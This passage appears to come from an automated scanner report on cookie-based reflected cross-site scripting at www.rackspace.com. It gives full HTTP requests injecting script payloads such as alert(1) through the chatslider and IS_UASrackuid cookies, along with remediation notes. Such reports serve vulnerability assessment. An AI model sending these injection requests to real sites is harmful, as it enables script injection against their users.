Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D49409"><script>alert(1)</script>8d089914acf; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea07"%3balert(1)//f6260c0da17 was submitted in the chatslider cookie. This input was echoed as 8ea07";alert(1)//f6260c0da17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8ea07"%3balert(1)//f6260c0da17; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dff0"><script>alert(1)</script>414d2177ddc was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap404.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d9dff0"><script>alert(1)</script>414d2177ddc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49edd"%3balert(1)//69feebe3346 was submitted in the IS_UASrackuid cookie. This input was echoed as 49edd";alert(1)//69feebe3346 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap404.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d49edd"%3balert(1)//69feebe3346; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc629"%3balert(1)//9e40bbd7211 was submitted in the chatslider cookie. This input was echoed as dc629";alert(1)//9e40bbd7211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap404.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Adc629"%3balert(1)//9e40bbd7211; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb8e9"><script>alert(1)</script>9b077acfc1d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap404.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Abb8e9"><script>alert(1)</script>9b077acfc1d; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e65"><script>alert(1)</script>35cb5f5e2ee was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e4e65"><script>alert(1)</script>35cb5f5e2ee; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c20"%3balert(1)//c41ccc278a4 was submitted in the IS_UASrackuid cookie. This input was echoed as 74c20";alert(1)//c41ccc278a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f874c20"%3balert(1)//c41ccc278a4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57436"%3balert(1)//6d21507bc95 was submitted in the chatslider cookie. This input was echoed as 57436";alert(1)//6d21507bc95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D57436"%3balert(1)//6d21507bc95; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55da8"><script>alert(1)</script>9c0a962351 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D55da8"><script>alert(1)</script>9c0a962351; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9028"%3balert(1)//47253253fe4 was submitted in the IS_UASrackuid cookie. This input was echoed as a9028";alert(1)//47253253fe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a9028"%3balert(1)//47253253fe4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a211a"><script>alert(1)</script>2f4041feedb was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a211a"><script>alert(1)</script>2f4041feedb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abf23"%3balert(1)//89a4027ea34 was submitted in the chatslider cookie. This input was echoed as abf23";alert(1)//89a4027ea34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dabf23"%3balert(1)//89a4027ea34; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0735"><script>alert(1)</script>a5ff1592e93 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc0735"><script>alert(1)</script>a5ff1592e93; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; 